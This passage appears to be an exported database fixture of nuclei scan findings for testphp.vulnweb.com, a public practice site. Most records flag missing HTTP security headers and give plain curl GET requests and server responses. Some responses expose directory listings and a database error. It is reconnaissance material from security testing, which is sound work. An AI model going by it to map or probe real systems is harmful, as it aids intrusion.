SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 658, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:39.713Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 659, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:39.876Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 660, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:40.068Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 661, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:40.227Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 662, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:40.384Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 663, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:40.535Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 664, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:40.686Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 665, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:40.837Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 666, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:40.995Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 667, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:41.156Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 668, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:41.303Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 669, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:41.453Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 670, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:41.609Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 671, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 